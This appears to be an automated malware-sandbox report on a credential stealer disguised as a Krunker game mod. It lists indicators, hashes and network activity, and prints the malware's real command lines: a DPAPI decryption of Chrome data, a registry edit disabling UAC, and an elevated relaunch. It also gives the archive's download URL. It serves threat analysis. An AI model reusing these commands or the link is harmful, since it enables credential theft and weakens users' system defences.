URL:

https://2657fa71559b7366ed642a2305b5cfe3.r2.cloudflarestorage.com/easyupload/42ezlv_Krunker7.1Modcleint.rar?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=c1da4bcf7c9076d105cb082e4270665b%2F20241223%2Fauto%2Fs3%2Faws4_request&X-Amz-Date=20241223T191224Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=f86d0a501a158c4bcf6a46af98671011899a3bdfad4e0124793ff49350e6d647

Full analysis: https://app.any.run/tasks/3bc01545-5033-4f97-a59a-a613063f6240
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: December 23, 2024, 19:35:41
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-exec
discord
arch-doc
stealer
python
Indicators:
MD5:

299B6092EAD0EBDD7F2303EE81ED1947

SHA1:

E36A537126D3A0124D45567D9A1654B4E3716BFC

SHA256:

DEFD0F37324C361052114BD53B832A4CCCFB84C173A8D4477A2EF5DC9D2BE051

SSDEEP:

6:2pSfOPH2YKdJFZX9OQuJyvttGPc07UtXXDsT9A8RjqabSwAgjLd/4TqSLDm:2pEOv2dJFZIQLvttTmgH8AAtXeTqSLi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 7992)
      • cmd.exe (PID: 6312)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 8060)
      • powershell.exe (PID: 7320)

    • Actions looks like stealing of personal data

      • Krunker7.1Modcleint.exe (PID: 7768)

    • Adds path to the Windows Defender exclusion list

      • Krunker7.1Modcleint.exe (PID: 7768)
      • cmd.exe (PID: 6516)
      • cmd.exe (PID: 8016)

    • UAC/LUA settings modification

      • reg.exe (PID: 7608)

    • Steals credentials from Web Browsers

      • Krunker7.1Modcleint.exe (PID: 7768)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 520)
      • ShellExperienceHost.exe (PID: 7944)

    • Executable content was dropped or overwritten

      • Krunker7.1Modcleint.exe (PID: 2600)
      • csc.exe (PID: 7008)
      • python-installer.exe (PID: 6180)
      • Krunker7.1Modcleint.exe (PID: 7768)
      • python-installer.exe (PID: 6164)

    • Starts CMD.EXE for commands execution

      • Krunker7.1Modcleint.exe (PID: 2600)
      • Krunker7.1Modcleint.exe (PID: 7768)
      • Krunker7.1Modcleint.exe (PID: 6776)
      • Krunker7.1Modcleint.exe (PID: 6648)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 4640)
      • cmd.exe (PID: 7992)
      • cmd.exe (PID: 396)
      • cmd.exe (PID: 5544)
      • cmd.exe (PID: 8016)
      • cmd.exe (PID: 6516)
      • cmd.exe (PID: 6524)
      • cmd.exe (PID: 6312)

    • The process executes Powershell scripts

      • cmd.exe (PID: 7992)
      • cmd.exe (PID: 6312)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 7008)

    • Get information on the list of running processes

      • Krunker7.1Modcleint.exe (PID: 7768)
      • cmd.exe (PID: 7996)
      • cmd.exe (PID: 3188)

    • Starts process via Powershell

      • powershell.exe (PID: 4520)
      • powershell.exe (PID: 3188)

    • Cryptography encrypted command line is found

      • powershell.exe (PID: 5308)
      • cmd.exe (PID: 5544)
      • powershell.exe (PID: 7656)
      • cmd.exe (PID: 396)

    • Uses WMIC.EXE to obtain physical disk drive information

      • cmd.exe (PID: 7160)
      • cmd.exe (PID: 8028)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2600)
      • cmd.exe (PID: 7620)

    • Uses TASKKILL.EXE to kill Browsers

      • cmd.exe (PID: 6032)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 6516)
      • cmd.exe (PID: 8016)

    • Uses WMIC.EXE to obtain data on the base board management (motherboard or system board)

      • cmd.exe (PID: 7040)
      • cmd.exe (PID: 6768)

    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 7716)
      • cmd.exe (PID: 6208)

    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 6184)
      • WMIC.exe (PID: 6528)

    • Accesses computer name via WMI (SCRIPT)

      • WMIC.exe (PID: 7244)

    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 7244)

    • Uses WMIC.EXE to obtain memory chip information

      • cmd.exe (PID: 7264)

    • Uses WMIC.EXE to obtain CPU information

      • cmd.exe (PID: 6716)

    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 6288)

    • Process drops legitimate windows executable

      • python-installer.exe (PID: 6164)
      • msiexec.exe (PID: 6188)

    • Reads the Windows owner or organization settings

      • msiexec.exe (PID: 6188)

    • The process drops C-runtime libraries

      • msiexec.exe (PID: 6188)
      • python-installer.exe (PID: 6164)

    • Process drops python dynamic module

      • msiexec.exe (PID: 6188)

  • INFO

    • Reads the computer name

      • identity_helper.exe (PID: 7740)
      • Krunker7.1Modcleint.exe (PID: 2600)
      • msiexec.exe (PID: 6188)
      • Krunker7.1Modcleint.exe (PID: 6776)

    • Checks supported languages

      • identity_helper.exe (PID: 7740)
      • Krunker7.1Modcleint.exe (PID: 2600)
      • Krunker7.1Modcleint.exe (PID: 7768)
      • cvtres.exe (PID: 8168)
      • csc.exe (PID: 7008)
      • ShellExperienceHost.exe (PID: 7944)
      • msiexec.exe (PID: 6188)
      • Krunker7.1Modcleint.exe (PID: 6776)
      • Krunker7.1Modcleint.exe (PID: 6648)

    • Application launched itself

      • msedge.exe (PID: 5640)

    • The process uses the downloaded file

      • msedge.exe (PID: 7592)
      • msedge.exe (PID: 5640)
      • WinRAR.exe (PID: 520)

    • Reads Environment values

      • identity_helper.exe (PID: 7740)
      • Krunker7.1Modcleint.exe (PID: 6648)

    • Create files in a temporary directory

      • Krunker7.1Modcleint.exe (PID: 2600)
      • Krunker7.1Modcleint.exe (PID: 7768)
      • csc.exe (PID: 7008)
      • python-installer.exe (PID: 6164)

    • Reads Microsoft Office registry keys

      • msedge.exe (PID: 5640)

    • Process checks computer location settings

      • Krunker7.1Modcleint.exe (PID: 2600)
      • Krunker7.1Modcleint.exe (PID: 6776)
      • Krunker7.1Modcleint.exe (PID: 6648)

    • The executable file from the user directory is run by the Powershell process

      • Krunker7.1Modcleint.exe (PID: 7768)
      • Krunker7.1Modcleint.exe (PID: 6648)

    • Creates files or folders in the user directory

      • Krunker7.1Modcleint.exe (PID: 7768)
      • msiexec.exe (PID: 6188)

    • Creates files in the program directory

      • Krunker7.1Modcleint.exe (PID: 7768)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6532)
      • powershell.exe (PID: 7744)

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 7696)
      • WMIC.exe (PID: 6828)
      • WMIC.exe (PID: 7244)
      • WMIC.exe (PID: 6528)
      • WMIC.exe (PID: 6732)
      • WMIC.exe (PID: 4076)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7744)
      • powershell.exe (PID: 6532)

    • Displays MAC addresses of computer network adapters

      • getmac.exe (PID: 6440)

    • The sample compiled with english language support

      • Krunker7.1Modcleint.exe (PID: 7768)
      • python-installer.exe (PID: 6180)
      • python-installer.exe (PID: 6164)
      • msiexec.exe (PID: 6188)

    • Reads the machine GUID from the registry

      • python-installer.exe (PID: 6164)

    • Mutex for Python MSI log

      • msiexec.exe (PID: 6188)
      • python-installer.exe (PID: 6164)

    • Reads the software policy settings

      • msiexec.exe (PID: 6188)

    • Manual execution by a user

      • Taskmgr.exe (PID: 3208)
      • Taskmgr.exe (PID: 1580)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 6188)

    • Creates a software uninstall entry

      • msiexec.exe (PID: 6188)

    • Reads product name

      • Krunker7.1Modcleint.exe (PID: 6648)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
224
Monitored processes
89
Malicious processes
6
Suspicious processes
8

Behavior graph

Click at the process to see the details
start msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs winrar.exe no specs krunker7.1modcleint.exe conhost.exe no specs cmd.exe no specs powershell.exe no specs krunker7.1modcleint.exe conhost.exe no specs cmd.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs wmic.exe no specs cmd.exe no specs tasklist.exe no specs cmd.exe no specs taskkill.exe no specs cmd.exe no specs cmd.exe no specs tasklist.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs reg.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wmic.exe no specs reg.exe no specs powershell.exe no specs shellexperiencehost.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs cmd.exe no specs wmic.exe no specs wmic.exe no specs cmd.exe no specs cmd.exe no specs wmic.exe no specs cmd.exe no specs wmic.exe no specs cmd.exe no specs wmic.exe no specs cmd.exe no specs wmic.exe no specs cmd.exe no specs wmic.exe no specs cmd.exe no specs getmac.exe no specs python-installer.exe python-installer.exe msiexec.exe taskmgr.exe no specs taskmgr.exe krunker7.1modcleint.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe no specs krunker7.1modcleint.exe conhost.exe no specs cmd.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
396C:\WINDOWS\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,7,104,106,19,244,3,72,70,145,69,23,254,229,195,123,51,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,168,107,224,243,105,130,17,51,102,224,140,169,25,63,129,98,209,82,74,216,20,214,48,1,80,87,163,100,64,229,54,249,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,11,193,237,28,124,20,248,68,43,119,128,170,188,163,135,70,173,95,25,54,72,132,203,73,66,254,134,25,129,164,238,48,0,0,0,209,12,254,148,255,228,245,184,135,231,116,216,209,99,55,22,50,218,43,53,171,135,191,123,48,106,132,195,12,39,54,231,71,239,11,215,155,70,31,236,173,237,167,158,33,172,150,130,64,0,0,0,111,170,54,27,62,222,66,183,53,90,197,175,213,50,248,82,39,84,226,43,204,78,118,131,194,34,50,93,146,1,196,126,22,88,91,165,175,223,151,47,9,17,56,1,13,30,3,242,31,213,100,134,95,181,233,109,69,108,99,91,11,54,148,132), $null, 'CurrentUser')"C:\Windows\System32\cmd.exeKrunker7.1Modcleint.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
520"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Downloads\Krunker7.1Modcleint.rar"C:\Program Files\WinRAR\WinRAR.exemsedge.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
624\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeKrunker7.1Modcleint.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
836tasklistC:\Windows\System32\tasklist.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1580"C:\WINDOWS\system32\taskmgr.exe" /7C:\Windows\System32\Taskmgr.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Manager
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskmgr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2600"C:\Users\admin\AppData\Local\Temp\Rar$EXa520.36677\Krunker7.1Modcleint.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa520.36677\Krunker7.1Modcleint.exe
WinRAR.exe
User:
admin
Company:
ssl
Integrity Level:
MEDIUM
Exit code:
0
Version:
0.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exa520.36677\krunker7.1modcleint.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\iphlpapi.dll
2600C:\WINDOWS\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"C:\Windows\System32\cmd.exeKrunker7.1Modcleint.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
3188C:\WINDOWS\system32\cmd.exe /d /s /c "tasklist"C:\Windows\System32\cmd.exeKrunker7.1Modcleint.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
3188powershell -Command "Start-Process 'C:\Users\admin\AppData\Local\Temp\Rar$EXa520.41080\Krunker7.1Modcleint.exe' -ArgumentList 'C:\snapshot\build\index.js' -Verb RunAs"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
3208"C:\WINDOWS\system32\taskmgr.exe" /7C:\Windows\System32\Taskmgr.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Manager
Exit code:
3221226540
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskmgr.exe
c:\windows\system32\ntdll.dll
Total events
64 043
Read events
62 731
Write events
1 277
Delete events
35

Modification events

(PID) Process:(5640) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(5640) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(5640) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(5640) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
(PID) Process:(5640) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:writeName:S-1-5-21-1693682860-607145093-2874071422-1001
Value:
7109D4628B882F00
(PID) Process:(5640) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:writeName:S-1-5-21-1693682860-607145093-2874071422-1001
Value:
5AD2DD628B882F00
(PID) Process:(5640) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\328454
Operation:writeName:WindowTabManagerFileMappingId
Value:
{0B38C972-623B-470D-9987-A79CF72AC4CE}
(PID) Process:(5640) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:writeName:S-1-5-21-1693682860-607145093-2874071422-1001
Value:
87A303638B882F00
(PID) Process:(7592) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:writeName:{2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF
Value:
0100000000000000AB0F5DE07155DB01
(PID) Process:(5640) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:MicrosoftEdgeAutoLaunch_29EBC4579851B72EE312C449CF839B1A
Value:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
Executable files
60
Suspicious files
297
Text files
687
Unknown types
1

Dropped files

PID
Process
Filename
Type
5640msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF13517e.TMP
MD5:
SHA256:
5640msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
5640msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF13517e.TMP
MD5:
SHA256:
5640msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF13518e.TMP
MD5:
SHA256:
5640msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
5640msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF13518e.TMP
MD5:
SHA256:
5640msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
5640msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
5640msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF1351ec.TMP
MD5:
SHA256:
5640msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
61
DNS requests
47
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
6484
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7112
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
6484
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6188
msiexec.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D
unknown
whitelisted
6188
msiexec.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D
unknown
whitelisted
6188
msiexec.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAcfFBuLMA0l8xTrIwzQ0d0%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2548
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5640
msedge.exe
239.255.255.250:1900
whitelisted
6316
msedge.exe
13.107.42.16:443
config.edge.skype.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
whitelisted
6316
msedge.exe
162.159.140.238:443
2657fa71559b7366ed642a2305b5cfe3.r2.cloudflarestorage.com
CLOUDFLARENET
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.120
whitelisted
google.com
  • 172.217.16.206
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
config.edge.skype.com
  • 13.107.42.16
whitelisted
edge.microsoft.com
  • 204.79.197.239
  • 13.107.21.239
  • 172.217.16.193
whitelisted
edge-mobile-static.azureedge.net
  • 13.107.246.45
whitelisted
2657fa71559b7366ed642a2305b5cfe3.r2.cloudflarestorage.com
  • 162.159.140.238
  • 172.66.0.236
unknown
business.bing.com
  • 13.107.6.158
whitelisted
bzib.nelreports.net
  • 2.22.242.105
  • 2.22.242.11
whitelisted

Threats

PID
Process
Class
Message
6316
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Cloudflare R2 Storage (r2 .cloudflarestorage .com)
6316
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Cloudflare R2 Storage (r2 .cloudflarestorage .com)
2192
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
7768
Krunker7.1Modcleint.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
https://2657fa71559b7366ed642a2305b5cfe3.r2.cloudflarestorage.com/easyupload/42ezlv_Krunker7.1Modcleint.rar?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=c1da4bcf7c9076d105cb082e4270665b%2F20241223%2Fauto%2Fs3%2Faws4_request&X-Amz-Date=20241223T191224Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=f86d0a501a158c4bcf6a46af98671011899a3bdfad4e0124793ff49350e6d647